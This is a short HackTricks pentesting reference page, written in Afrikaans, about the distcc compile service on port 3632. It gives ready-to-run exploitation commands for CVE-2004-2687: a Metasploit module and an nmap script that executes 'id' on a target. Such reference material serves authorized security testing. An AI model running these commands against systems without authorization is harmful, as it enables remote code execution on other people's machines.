hacktricks/src/network-services-pentesting/3632-pentesting-distcc.md

31 lines
1.2 KiB
Markdown

{{#include ../banners/hacktricks-training.md}}
# Basiese Inligting
**Distcc** is 'n hulpmiddel wat die **kompilasieproses** verbeter deur die **onbenutte verwerkingskrag** van ander rekenaars in die netwerk te benut. Wanneer **distcc** op 'n masjien opgestel is, is hierdie masjien in staat om sy **kompilasietake** na 'n ander stelsel te versprei. Hierdie ontvangerstelsel moet die **distccd daemon** draai en moet 'n **kompatible kompileerder** geïnstalleer hê om die gestuurde kode te verwerk.
**Standaard poort:** 3632
```
PORT STATE SERVICE
3632/tcp open distccd
```
# Exploitatie
Kontroleer of dit kwesbaar is vir **CVE-2004-2687** om arbitrêre kode uit te voer:
```bash
msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"
```
# Shodan
_Ek dink nie shodan detecteer hierdie diens nie._
# Resources
- [https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec](https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec)
- [https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855](https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855)
Post geskep deur **Álex B (@r1p)**
{{#include ../banners/hacktricks-training.md}}